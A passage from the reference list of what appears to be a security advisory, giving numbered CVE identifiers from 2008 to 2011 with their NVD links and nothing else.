http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5504 [ 44 ] CVE-2008-5505 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5505 [ 45 ] CVE-2008-5506 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5506 [ 46 ] CVE-2008-5507 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5507 [ 47 ] CVE-2008-5508 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5508 [ 48 ] CVE-2008-5510 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5510 [ 49 ] CVE-2008-5511 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5511 [ 50 ] CVE-2008-5512 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5512 [ 51 ] CVE-2008-5513 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5513 [ 52 ] CVE-2008-5822 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5822 [ 53 ] CVE-2008-5913 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5913 [ 54 ] CVE-2008-6961 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-6961 [ 55 ] CVE-2009-0071 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0071 [ 56 ] CVE-2009-0071 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0071 [ 57 ] CVE-2009-0352 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0352 [ 58 ] CVE-2009-0353 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0353 [ 59 ] CVE-2009-0354 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0354 [ 60 ] CVE-2009-0355 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0355 [ 61 ] CVE-2009-0356 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0356 [ 62 ] CVE-2009-0357 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0357 [ 63 ] CVE-2009-0358 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0358 [ 64 ] CVE-2009-0652 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0652 [ 65 ] CVE-2009-0771 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0771 [ 66 ] CVE-2009-0772 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0772 [ 67 ] CVE-2009-0773 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0773 [ 68 ] CVE-2009-0774 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0774 [ 69 ] CVE-2009-0775 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0775 [ 70 ] CVE-2009-0776 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0776 [ 71 ] CVE-2009-0777 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0777 [ 72 ] CVE-2009-1044 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1044 [ 73 ] CVE-2009-1169 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1169 [ 74 ] CVE-2009-1302 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1302 [ 75 ] CVE-2009-1303 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1303 [ 76 ] CVE-2009-1304 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1304 [ 77 ] CVE-2009-1305 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1305 [ 78 ] CVE-2009-1306 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1306 [ 79 ] CVE-2009-1307 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1307 [ 80 ] CVE-2009-1308 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1308 [ 81 ] CVE-2009-1309 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1309 [ 82 ] CVE-2009-1310 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1310 [ 83 ] CVE-2009-1311 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1311 [ 84 ] CVE-2009-1312 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1312 [ 85 ] CVE-2009-1313 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1313 [ 86 ] CVE-2009-1392 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1392 [ 87 ] CVE-2009-1563 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1563 [ 88 ] CVE-2009-1571 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1571 [ 89 ] CVE-2009-1828 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1828 [ 90 ] CVE-2009-1832 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1832 [ 91 ] CVE-2009-1833 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1833 [ 92 ] CVE-2009-1834 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1834 [ 93 ] CVE-2009-1835 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1835 [ 94 ] CVE-2009-1836 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1836 [ 95 ] CVE-2009-1837 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1837 [ 96 ] CVE-2009-1838 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1838 [ 97 ] CVE-2009-1839 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1839 [ 98 ] CVE-2009-1840 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1840 [ 99 ] CVE-2009-1841 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1841 [ 100 ] CVE-2009-2043 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2043 [ 101 ] CVE-2009-2044 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2044 [ 102 ] CVE-2009-2061 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2061 [ 103 ] CVE-2009-2065 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2065 [ 104 ] CVE-2009-2210 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2210 [ 105 ] CVE-2009-2404 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2404 [ 106 ] CVE-2009-2408 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2408 [ 107 ] CVE-2009-2462 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2462 [ 108 ] CVE-2009-2463 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2463 [ 109 ] CVE-2009-2464 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2464 [ 110 ] CVE-2009-2465 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2465 [ 111 ] CVE-2009-2466 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2466 [ 112 ] CVE-2009-2467 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2467 [ 113 ] CVE-2009-2469 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2469 [ 114 ] CVE-2009-2470 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2470 [ 115 ] CVE-2009-2471 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2471 [ 116 ] CVE-2009-2472 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2472 [ 117 ] CVE-2009-2477 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2477 [ 118 ] CVE-2009-2478 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2478 [ 119 ] CVE-2009-2479 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2479 [ 120 ] CVE-2009-2535 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2535 [ 121 ] CVE-2009-2654 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2654 [ 122 ] CVE-2009-2662 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2662 [ 123 ] CVE-2009-2664 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2664 [ 124 ] CVE-2009-2665 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2665 [ 125 ] CVE-2009-3069 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3069 [ 126 ] CVE-2009-3070 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3070 [ 127 ] CVE-2009-3071 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3071 [ 128 ] CVE-2009-3072 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3072 [ 129 ] CVE-2009-3074 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3074 [ 130 ] CVE-2009-3075 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3075 [ 131 ] CVE-2009-3076 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3076 [ 132 ] CVE-2009-3077 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3077 [ 133 ] CVE-2009-3078 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3078 [ 134 ] CVE-2009-3079 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3079 [ 135 ] CVE-2009-3274 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3274 [ 136 ] CVE-2009-3371 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3371 [ 137 ] CVE-2009-3372 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3372 [ 138 ] CVE-2009-3373 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3373 [ 139 ] CVE-2009-3374 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3374 [ 140 ] CVE-2009-3375 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3375 [ 141 ] CVE-2009-3376 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3376 [ 142 ] CVE-2009-3377 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3377 [ 143 ] CVE-2009-3378 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3378 [ 144 ] CVE-2009-3379 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3379 [ 145 ] CVE-2009-3380 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3380 [ 146 ] CVE-2009-3381 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3381 [ 147 ] CVE-2009-3382 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3382 [ 148 ] CVE-2009-3383 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3383 [ 149 ] CVE-2009-3388 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3388 [ 150 ] CVE-2009-3389 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3389 [ 151 ] CVE-2009-3555 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3555 [ 152 ] CVE-2009-3978 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3978 [ 153 ] CVE-2009-3979 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3979 [ 154 ] CVE-2009-3980 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3980 [ 155 ] CVE-2009-3981 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3981 [ 156 ] CVE-2009-3982 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3982 [ 157 ] CVE-2009-3983 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3983 [ 158 ] CVE-2009-3984 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3984 [ 159 ] CVE-2009-3985 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3985 [ 160 ] CVE-2009-3986 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3986 [ 161 ] CVE-2009-3987 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3987 [ 162 ] CVE-2009-3988 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3988 [ 163 ] CVE-2010-0159 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0159 [ 164 ] CVE-2010-0160 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0160 [ 165 ] CVE-2010-0162 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0162 [ 166 ] CVE-2010-0163 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0163 [ 167 ] CVE-2010-0164 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0164 [ 168 ] CVE-2010-0165 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0165 [ 169 ] CVE-2010-0166 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0166 [ 170 ] CVE-2010-0167 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0167 [ 171 ] CVE-2010-0167 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0167 [ 172 ] CVE-2010-0168 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0168 [ 173 ] CVE-2010-0169 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0169 [ 174 ] CVE-2010-0169 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0169 [ 175 ] CVE-2010-0170 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0170 [ 176 ] CVE-2010-0171 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0171 [ 177 ] CVE-2010-0171 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0171 [ 178 ] CVE-2010-0172 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0172 [ 179 ] CVE-2010-0173 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0173 [ 180 ] CVE-2010-0174 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0174 [ 181 ] CVE-2010-0174 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0174 [ 182 ] CVE-2010-0175 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0175 [ 183 ] CVE-2010-0175 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0175 [ 184 ] CVE-2010-0176 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0176 [ 185 ] CVE-2010-0176 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0176 [ 186 ] CVE-2010-0177 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0177 [ 187 ] CVE-2010-0178 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0178 [ 188 ] CVE-2010-0179 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0179 [ 189 ] CVE-2010-0181 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0181 [ 190 ] CVE-2010-0182 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0182 [ 191 ] CVE-2010-0183 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0183 [ 192 ] CVE-2010-0220 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0220 [ 193 ] CVE-2010-0648 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0648 [ 194 ] CVE-2010-0654 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0654 [ 195 ] CVE-2010-1028 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1028 [ 196 ] CVE-2010-1121 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1121 [ 197 ] CVE-2010-1125 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1125 [ 198 ] CVE-2010-1196 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1196 [ 199 ] CVE-2010-1197 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1197 [ 200 ] CVE-2010-1198 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1198 [ 201 ] CVE-2010-1199 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1199 [ 202 ] CVE-2010-1200 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1200 [ 203 ] CVE-2010-1201 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1201 [ 204 ] CVE-2010-1202 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1202 [ 205 ] CVE-2010-1203 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1203 [ 206 ] CVE-2010-1205 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1205 [ 207 ] CVE-2010-1206 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1206 [ 208 ] CVE-2010-1207 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1207 [ 209 ] CVE-2010-1208 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1208 [ 210 ] CVE-2010-1209 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1209 [ 211 ] CVE-2010-1210 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1210 [ 212 ] CVE-2010-1211 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1211 [ 213 ] CVE-2010-1212 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1212 [ 214 ] CVE-2010-1213 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1213 [ 215 ] CVE-2010-1214 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1214 [ 216 ] CVE-2010-1215 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1215 [ 217 ] CVE-2010-1585 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1585 [ 218 ] CVE-2010-2751 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2751 [ 219 ] CVE-2010-2752 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2752 [ 220 ] CVE-2010-2753 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2753 [ 221 ] CVE-2010-2754 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2754 [ 222 ] CVE-2010-2755 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2755 [ 223 ] CVE-2010-2760 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2760 [ 224 ] CVE-2010-2762 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2762 [ 225 ] CVE-2010-2763 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2763 [ 226 ] CVE-2010-2764 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2764 [ 227 ] CVE-2010-2765 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2765 [ 228 ] CVE-2010-2766 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2766 [ 229 ] CVE-2010-2767 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2767 [ 230 ] CVE-2010-2768 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2768 [ 231 ] CVE-2010-2769 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2769 [ 232 ] CVE-2010-2770 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2770 [ 233 ] CVE-2010-3131 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3131 [ 234 ] CVE-2010-3166 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3166 [ 235 ] CVE-2010-3167 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3167 [ 236 ] CVE-2010-3168 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3168 [ 237 ] CVE-2010-3169 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3169 [ 238 ] CVE-2010-3170 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3170 [ 239 ] CVE-2010-3171 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3171 [ 240 ] CVE-2010-3173 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3173 [ 241 ] CVE-2010-3174 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3174 [ 242 ] CVE-2010-3175 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3175 [ 243 ] CVE-2010-3176 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3176 [ 244 ] CVE-2010-3177 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3177 [ 245 ] CVE-2010-3178 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3178 [ 246 ] CVE-2010-3179 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3179 [ 247 ] CVE-2010-3180 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3180 [ 248 ] CVE-2010-3182 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3182 [ 249 ] CVE-2010-3183 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3183 [ 250 ] CVE-2010-3399 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3399 [ 251 ] CVE-2010-3400 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3400 [ 252 ] CVE-2010-3765 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3765 [ 253 ] CVE-2010-3766 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3766 [ 254 ] CVE-2010-3767 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3767 [ 255 ] CVE-2010-3768 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3768 [ 256 ] CVE-2010-3769 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3769 [ 257 ] CVE-2010-3770 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3770 [ 258 ] CVE-2010-3771 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3771 [ 259 ] CVE-2010-3772 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3772 [ 260 ] CVE-2010-3773 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3773 [ 261 ] CVE-2010-3774 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3774 [ 262 ] CVE-2010-3775 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3775 [ 263 ] CVE-2010-3776 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3776 [ 264 ] CVE-2010-3777 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3777 [ 265 ] CVE-2010-3778 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3778 [ 266 ] CVE-2010-4508 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4508 [ 267 ] CVE-2010-5074 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-5074 [ 268 ] CVE-2011-0051 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0051 [ 269 ] CVE-2011-0053 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0053 [ 270 ] CVE-2011-0054 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0054 [ 271 ] CVE-2011-0055 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0055 [ 272 ] CVE-2011-0056 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0056 [ 273 ] CVE-2011-0057 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0057 [ 274 ] CVE-2011-0058 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0058 [ 275 ] CVE-2011-0059 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0059 [ 276 ] CVE-2011-0061 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0061 [ 277 ] CVE-2011-0062 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0062 [ 278 ] CVE-2011-0065 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0065 [ 279 ] CVE-2011-0066 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0066 [ 280 ] CVE-2011-0067 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0067 [ 281 ] CVE-2011-0068 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0068 [ 282 ] CVE-2011-0069 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0069 [ 283 ] CVE-2011-0070 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0070 [ 284 ] CVE-2011-0071 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0071 [ 285 ] CVE-2011-0072 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0072 [ 286 ] CVE-2011-0073 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0073 [ 287 ] CVE-2011-0074 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0074 [ 288 ] CVE-2011-0075 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0075 [ 289 ] CVE-2011-0076 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0076 [ 290 ] CVE-2011-0077 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0077 [ 291 ] CVE-2011-0078 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0078 [ 292 ] CVE-2011-0079 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0079 [ 293 ] CVE-2011-0080 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0080 [ 294 ] CVE-2011-0081 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0081 [ 295 ] CVE-2011-0082 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0082 [ 296 ] CVE-2011-0083 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0083 [ 297 ] CVE-2011-0084 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0084 [ 298 ] CVE-2011-0085 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0085 [ 299 ] CVE-2011-1187 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1187 [ 300 ] CVE-2011-1202 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1202 [ 301 ] CVE-2011-1712 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1712 [ 302 ] CVE-2011-2362 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2362 [ 303 ] CVE-2011-2363 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2363 [ 304 ] CVE-2011-2364 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2364 [ 305 ] CVE-2011-2365 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2365 [ 306 ] CVE-2011-2369 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2369 [ 307 ] CVE-2011-2370 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2370 [ 308 ] CVE-2011-2371 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2371 [ 309 ] CVE-2011-2372 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2372 [ 310 ] CVE-2011-2373 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2373 [ 311 ] CVE-2011-2374 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2374 [ 312 ] CVE-2011-2375 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2375 [ 313 ] CVE-2011-2376 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2376 [ 314 ] CVE-2011-2377 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2377 [ 315 ] CVE-2011-2378 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2378 [ 316 ] CVE-2011-2605 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2605 [ 317 ] CVE-2011-2980 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2980 [ 318 ] CVE-2011-2981 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2981 [ 319 ] CVE-2011-2982 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2982 [ 320 ] CVE-2011-2983 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2983 [ 321 ] CVE-2011-2984 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2984 [ 322 ] CVE-2011-2985 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2985 [ 323 ] CVE-2011-2986 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2986 [ 324 ] CVE-2011-2987 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2987 [ 325 ] CVE-2011-2988 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2988 [ 326 ] CVE-2011-2989 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2989 [ 327 ] CVE-2011-2990 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2990 [ 328 ] CVE-2011-2991 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2991 [ 329 ] CVE-2011-2993 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2993 [ 330 ] CVE-2011-2995 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2995 [ 331 ] CVE-2011-2996 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2996 [ 332 ] CVE-2011-2997 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2997 [ 333 ] CVE-2011-2998 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2998 [ 334 ] CVE-2011-2999 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2999 [ 335 ] CVE-2011-3000 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3000 [ 336 ] CVE-2011-3001 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3001 [ 337 ] CVE-2011-3002 